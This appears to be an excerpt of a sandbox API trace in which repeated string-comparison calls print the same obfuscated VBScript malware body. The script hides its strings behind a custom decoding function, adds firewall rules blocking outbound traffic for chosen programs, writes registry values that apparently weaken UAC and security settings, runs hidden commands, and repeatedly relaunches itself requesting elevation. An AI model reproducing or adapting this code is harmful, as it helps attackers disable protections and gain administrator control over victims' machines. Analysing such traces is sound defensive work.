bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.000] wcsncmp (_String1="each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.000] wcsncmp (_String1="ach rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0223.000] wcsncmp (_String1="ch rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0223.000] wcsncmp (_String1="h rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd 